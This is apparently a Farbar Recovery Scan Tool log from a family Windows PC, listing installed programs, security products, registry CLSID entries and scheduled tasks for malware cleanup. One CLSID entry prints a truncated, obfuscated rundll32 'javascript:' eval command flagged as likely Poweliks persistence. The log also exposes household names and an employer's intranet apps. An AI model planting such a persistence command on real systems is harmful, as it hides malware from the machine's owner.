2014-12-09 17:48 - 2013-06-21 15:50 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-12-09 17:48 - 2013-06-21 15:50 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-12-09 17:48 - 2013-06-21 15:50 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-12-09 17:31 - 2014-08-30 05:57 - 00000000 ____D () C:\Program Files (x86)\AVG SafeGuard toolbar
2014-12-09 17:31 - 2013-07-11 13:27 - 00052000 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx64.sys
2014-12-07 08:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-12-06 07:44 - 2013-11-22 21:40 - 00949760 ___SH () C:\Users\Chris\Downloads\Thumbs.db
2014-11-30 08:15 - 2014-11-03 20:50 - 00000000 ____D () C:\Users\Chris\Desktop\2014_11_03
2014-11-29 14:26 - 2009-12-09 20:45 - 00000000 ____D () C:\Users\Chris
2014-11-24 14:44 - 2013-06-21 15:28 - 00000000 ____D () C:\Users\Chris\AppData\Local\Cisco
2014-11-23 19:21 - 2014-10-12 19:33 - 00000530 _____ () C:\Users\Kids\Desktop\Williams, Laurie L - Welcome.website
2014-11-21 17:35 - 2014-08-21 09:14 - 00000240 _____ () C:\Users\Kids\Desktop\Club Penguin Waddle around and meet new friends.url
2014-11-21 08:10 - 2014-04-02 15:58 - 00000000 ____D () C:\Users\Kids\Desktop\Emilia's Folder
2014-11-21 06:14 - 2010-03-01 18:43 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-11-20 17:32 - 2014-04-05 14:23 - 00000000 ____D () C:\Users\Kids\Desktop\Microsoft Office
2014-11-16 19:39 - 2012-09-27 13:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foto-Mosaik-Edda
2014-11-16 19:39 - 2012-09-27 13:00 - 00000000 ____D () C:\Program Files (x86)\Foto-Mosaik-Edda
Some content of TEMP:
====================
C:\Users\Chris\AppData\Local\Temp\SkypeSetup.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-12-15 00:28
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-12-2014 01
Ran by Chris at 2014-12-16 05:56:44
Running from C:\Users\Chris\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: AVG AntiVirus Free Edition 2013 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Kaspersky Anti-Virus (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}
AS: Kaspersky Anti-Virus (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Disabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2013 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Acrobat.com (HKLM-x32\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (x32 Version: 2.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.6.0.5970 - Adobe Systems Incorporated)
Adobe Anchor Service x64 CS4 (Version: 2.0 - Adobe Systems Incorporated) Hidden
Adobe CMaps x64 CS4 (Version: 2.0 - Adobe Systems Incorporated) Hidden
Adobe CSI CS4 x64 (Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Drive CS4 x64 (Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Fonts All x64 (Version: 2.0 - Adobe Systems Incorporated) Hidden
Adobe Linguistics CS4 x64 (Version: 4.0.0 - Adobe Systems Incorporated) Hidden
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe PDF Library Files x64 CS4 (Version: 9.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop CS4 (64 Bit) (Version: 11.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop CS4 (HKLM-x32\...\Adobe_faf656ef605427ee2f42989c3ad31b8) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Adobe Type Support x64 CS4 (Version: 9.0 - Adobe Systems Incorporated) Hidden
Adobe WinSoft Linguistics Plugin x64 (Version: 1.1 - Adobe Systems Incorporated) Hidden
Amazon Kindle (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Amazon Kindle) (Version: - Amazon)
Apple Application Support (HKLM-x32\...\{A93944F2-D2D4-4750-BFE7-9A288FEAF2CF}) (Version: 1.3.1 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{6956856F-B6B3-4BE0-BA0B-8F495BE32033}) (Version: 2.1.1.116 - Apple Inc.)
ASUS Android USB Drivers (HKLM\...\{F6AEADC0-6B97-430E-B78A-C1D633A6528D}) (Version: 4.0.6753 - ASUSTeK Computer Inc.)
ASUS Sync (HKLM-x32\...\{488E9FD9-7C30-4120-8790-410F46F13CD6}) (Version: 1.0.97 - FutureDial Inc.)
AVG 2013 (HKLM\...\AVG) (Version: 2013.0.3495 - AVG Technologies)
AVG 2013 (Version: 13.0.3495 - AVG Technologies) Hidden
AVG 2013 (Version: 13.0.4235 - AVG Technologies) Hidden
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 18.2.0.829 - AVG Technologies)
BeerSmith (HKLM-x32\...\BeerSmith) (Version: - )
BioShock 2 (x32 Version: 1.0.0005.131 - Take-Two Interactive Software) Hidden
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: - )
Canon IJ Network Scan Utility (HKLM-x32\...\Canon_IJ_Network_Scan_UTILITY) (Version: - )
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version: - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version: - )
Canon MX870 series User Registration (HKLM-x32\...\Canon MX870 series User Registration) (Version: - )
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: - )
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version: - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 4.01 - Piriform)
Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.04066 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.04066 - Cisco Systems, Inc.) Hidden
Cisco Systems VPN Client 5.0.07.0290 (HKLM\...\{467D5E81-8349-4892-9E81-C3674ED8E451}) (Version: 5.0.7 - Cisco Systems, Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 13.4.0.25 - Citrix Systems, Inc.)
Citrix XenApp Web Plugin (HKLM-x32\...\{C0B165DC-F037-483F-B1C9-D89D91529CEB}) (Version: 11.0.150.5357 - Citrix Systems, Inc.)
Combined Community Codec Pack 2011-11-11 (HKLM-x32\...\Combined Community Codec Pack_is1) (Version: 2011.11.11.0 - CCCP Project)
Connect (x32 Version: 1.0.0.1 - Adobe Systems Incorporated) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.16 - Piriform)
Dropbox (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Dropbox) (Version: 2.0.22 - Dropbox, Inc.)
DVDFab 6.2.0.5 (11/11/2009) (HKLM-x32\...\DVDFab 6_is1) (Version: - Fengtao Software Inc.)
DVDFab 8.1.9.8 (27/07/2012) Qt (HKLM-x32\...\DVDFab 8 Qt_is1) (Version: - Fengtao Software Inc.)
EndNote X5 (HKLM-x32\...\{86B3F2D6-AC2B-0015-8AE1-F2F77F781B0C}) (Version: 15.0.0.5478 - Thomson Reuters)
ffdshow v1.1.4096 [2011-11-29] (HKLM-x32\...\ffdshow_is1) (Version: 1.1.4096.0 - )
Foto-Mosaik-Edda Standard V6.8.14126.1 (HKLM-x32\...\{A2D6ECD0-7E52-42B7-9236-DB2951436616}_is1) (Version: - Steffen Schirmer)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Java 8 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418025F0}) (Version: 8.0.250 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kaspersky Anti-Virus (HKLM-x32\...\InstallWIX_{8ED07EBD-22AD-415A-B71E-C1AD86862C2E}) (Version: 15.0.1.415 - Kaspersky Lab)
Kaspersky Anti-Virus (x32 Version: 15.0.1.415 - Kaspersky Lab) Hidden
kuler (x32 Version: 2.0 - Adobe Systems Incorporated) Hidden
LG VZW United Drivers (HKLM-x32\...\{FF712194-6643-4E4D-A340-2D447A644F75}) (Version: 2.16.1 - LG Electronics)
LiveUpdate 3.2 (Symantec Corporation) (HKLM-x32\...\LiveUpdate) (Version: 3.2.0.68 - Symantec Corporation)
Logitech Solar App 1.10 (HKLM\...\SolarApp) (Version: 1.10.3 - Logitech)
Logitech Webcam Software (HKLM\...\{987FE247-4E69-4A2E-A961-D14F901FDBF6}) (Version: 12.10.1113 - Logitech Inc.)
Logitech Webcam Software Driver Package (HKLM\...\lvdrivers_12.10) (Version: 12.10.1110 - Logitech Inc.)
M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player v 1.1 (HKLM-x32\...\M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player_is1) (Version: 1 - Softpointer Inc)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mazaika 3.7 (HKLM-x32\...\Mazaika_is1) (Version: - Boris A. Glazer)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE (HKLM-x32\...\{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}) (Version: 3.1.186.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 1.1.500.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 15.0.4667.1002 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-0081-0409-0000-0000000FF1CE}) (Version: 14.0.6123.5001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\OneDriveSetup.exe) (Version: 17.3.1229.0918 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MotoConnect (HKLM-x32\...\{B4654A72-087B-49B5-BDCA-E4894400C524}) (Version: 1.1.29 - Motorola)
MSI Afterburner 2.2.3 (HKLM-x32\...\Afterburner) (Version: 2.2.3 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
My Computer (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\portal-12cd4d5@@XA5 Prod:My Computer) (Version: 1.0 - Delivered by Citrix)
Norton Ghost (HKLM-x32\...\{B0255743-165B-4BD5-8DA8-37DFB9930015}) (Version: 15.0.1.36526 - Symantec Corporation)
NVIDIA 3D Vision Controller Driver 285.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 285.62 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)
NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.11.0621 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.11.0621 - NVIDIA Corporation)
NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4667.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4667.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4667.1002 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 13.4.0.25 - Citrix Systems, Inc.) Hidden
PDF Settings CS4 (x32 Version: 9.0 - Adobe Systems Incorporated) Hidden
Photoshop Camera Raw (x32 Version: 5.0 - Adobe Systems Incorporated) Hidden
Photoshop Camera Raw_x64 (Version: 5.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5995 - Realtek Semiconductor Corp.)
Remote Desktop Connection (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\portal-12cd4d5@@XA5 Prod:Remote Desktop Connection) (Version: 1.0 - Delivered by Citrix)
Samsung Auto Backup (HKLM-x32\...\{821D6F49-1B20-4809-8C73-286CFC52B1B1}) (Version: 4.1.371.0 - Clarus)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung SecretZone (HKLM-x32\...\{66491E5A-7899-4863-A2E9-057E10BCB578}) (Version: 2.0 - Clarus)
Self-service Plug-in (x32 Version: 3.4.0.33684 - Citrix Systems, Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.9.12585 - Skype Technologies S.A.)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Suite Shared Configuration CS4 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1164 - SUPERAntiSpyware.com)
System Requirements Lab CYRI (HKLM-x32\...\{1F77C418-2C90-459C-BD33-B56A4182B9FA}) (Version: 4.4.26.0 - Husdawg, LLC)
TP-LINK TL-WN721N_TL-WN722N Driver (HKLM-x32\...\{86A7EED0-02D0-4D91-8183-8D2F23F5E6AE}) (Version: 1.3.1 - TP-LINK)
TP-LINK Wireless Client Utility (HKLM-x32\...\{7A2A107B-9695-423F-9462-8F17C178BD35}) (Version: 7.0 - TP-LINK)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
WakeOne (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\portal-12cd4d5@@Hyperspace:WakeOne) (Version: 1.0 - Delivered by Citrix)
WFUBMC Intranet Apps (HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\portal-12cd4d5@@XA5 Prod:WFUBMC Intranet Apps) (Version: 1.0 - Delivered by Citrix)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version: - )
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
YTD Toolbar v10.3 (HKLM-x32\...\{DB3044F4-47BE-4104-8AED-D0B4038CCC80}) (Version: 10.3 - Spigot, Inc.) <==== ATTENTION
Zan Image Printer 5.0 (HKLM\...\zvprt50) (Version: - )
ZD Manager (HKLM-x32\...\ZDManager) (Version: - Zendeals)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Chris\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Chris\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
==================== Restore Points =========================
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {056EE872-E470-4C84-B2F2-F220401BBBED} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe [2013-01-17] ()
